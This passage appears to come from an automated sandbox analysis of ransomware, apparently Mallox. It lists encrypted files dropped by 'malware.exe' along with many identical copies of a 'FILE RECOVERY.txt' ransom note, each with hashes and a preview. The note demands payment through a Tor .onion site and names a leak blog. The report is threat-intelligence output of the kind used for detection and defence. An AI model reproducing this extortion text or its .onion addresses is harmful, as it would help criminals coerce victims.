                        SSDEEP:12288:8zybkEfcND9+/gVymSXxNd64mJFBX4EStAp8FAx1JN2My59CRF:GYCZ+/gVNSPd6zBX4PAnqE
                        MD5:08C1DA3CA17C4FB57906F06F5455BD21
                        SHA1:CEBD1E6B4DD8BD1CC782B30F50A6D6E76187B78D
                        SHA-256:C02A39735BB261B374AFBE266255C8FE402EA6B6E723DCF4ED07F1840DF5FEAB
                        SHA-512:16DD1AD53146408FDC251F31D6AB44E202B7F64E3D831DFEE11E29A855921E6D4A8FFA4FD366A5325091B32E14B1271B2EFF29F49F00662F81F3B7CCD7120459
                        Malicious:true
                        Preview:\....5..*.u.(...j..OOAK=...`..R..T.`...'.....D..a..O..xF.9x.@:.M&.Jsq.....C..XMNivM...PS....6.2.*..<....%..W..i.n(....J....%l.I..,....U'.TU.S.){R^. .*.U..w.>.VC..H....#.....2_mZ..g(.k..:.V.~..`h[.>....bK$.k.Z.........-.4..]...#.#...P..F...FC..W..+....&.lb..-..N..>...O..PK..:').O>...i\./.....st.qW..V.....NC`...r..7..[.J...R.U..I.....{x..5..Gt.wT....Q....P#./C.E..lR.`......4.t.....e.j....../.e...l..y.<...>..cT..C==..i4./N...m..d[.....j.=CV.y.;V.....6.1..;.......,N.4.....^...y(.7:...M0~..-...?...=p.!}.ghCd...Ky..3Od7........1mqI.u..+.c.6=n...y.X.<?K..vM;.1.@&7...v.P.l.e.!mL.hA.D.....v$..>N...Le.,!I...h...........7..Go...^.).D.|..Q...Pi.......y..I).........4.uN5....h;.R..E...N.Y.."bi........8F......0-..>.c..o.uk.^MI..D.*0:.:%....Up ...|.$....2h";.)...s.E.{..&0..c..U.)k`..k...lK.c....s..5{...L.'.y.Z).;..C-G.=..>@..j.<Te.....6.......K1.z+#..1....'..'.:.m. .(<K27.H.#....!y(F..f._G.r0..5.3....C.#......\.3.x.A...2.!...&[.Kd...fo`.3.D.4.a.."Z]69..`%..._!Z

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\weblink.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):374852
                        Entropy (8bit):7.997476196065467
                        Encrypted:true
                        SSDEEP:6144:tmZ0Ak0LDxYtsTpnERfW9QN9CoeGC2emcrdQahxGGVQngE6fZi0GJzjR8lQ6:S0tGDqyRZ9QNwxmIdt7GG/E6fZAz2lQ6
                        MD5:ECABD6331DCD03CA135B13436F12A83F
                        SHA1:991AFAEC637E2B2A2F439100BD8B5BA9D891FDA9
                        SHA-256:CB1AE809F3068BC72A3C4D3913286D3D46DE4E313D8F028FB70BD6CF397891EA
                        SHA-512:CB560E8827C7EB0582ECC786A67DDC5A9E84157F510526C1CAEC0F2E79D8CCDD348A0BA324AF8145CF596609CDA42E37A4E47FA57C295FFE149168269F202763
                        Malicious:true
                        Preview:....n.i...sE.k..v.]6..Y.?.....>..G....Q..7~[..*=...;B_..d..1...I......%.. ...&....)....@k..s...)..h~..;........V..u..=J..y%...;...$K......H..H.....u.0.....Q...*.u....d..|.F......4.....~[..M.m,.......<.l.....^...^.$tv...........n.S/...6.P/.A. \..].....TqM..g. ..h2)o.^y......./GL.h6.F..u..s.......;...5.je..}:.A........t.....:.#..|.eX..=Y._ZA*7.V...m.z[.}2r..*..7B..[..M....Pc.B/...?S...;.:..tN..cu.gE....H.{ZMU.".......Vy...0E..}.K..X.s...Hw.?J.......GNK..,.k.....E.F.s4.....T...wg..kOy(..Fo....r..j<..+. d..!6....+...(...M.....b.`........r}p..7.....*...J&..Y....Q.rtS....H..!..MJ.S.?l..1.R.I...D".....ql..&[p8X.......]zh..P^2.}J.R.q.O...u..6.A....\.g'.....`...#.^..QS[..8..|...A...)....P..xE..Y...C&..>.J.v.....+.).._..q.."..,.........[5..r1......Y.....yJ.E..4.c.. ^.!T/.G#....]@.c..+.... ...f..1.6.U.......o.1D....h...uD7....Fyt3.u.....Vk.M[.2.#..B...aR.(...>.^..b.(..p.h%../.e..F.7..l..l.KQH..f..[.kl3...........!..%.B'H'..Q..qd..4.a.E..U..~]u+..o

                        C:\ProgramData\Microsoft\AppV\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\AppV\Setup\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\ClickToRun\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\ClickToRun\MachineData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\ClickToRun\MachineData\Integration\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\ClickToRun\MachineData\Integration\ShortcutBackups\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\ClickToRun\ProductReleases\AAD0B0DB-711A-45EF-A013-BDD28531EC08\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\ClickToRun\ProductReleases\AAD0B0DB-711A-45EF-A013-BDD28531EC08\en-us.16\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\ClickToRun\ProductReleases\AAD0B0DB-711A-45EF-A013-BDD28531EC08\x-none.16\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\ClickToRun\ProductReleases\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\ClickToRun\UserData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
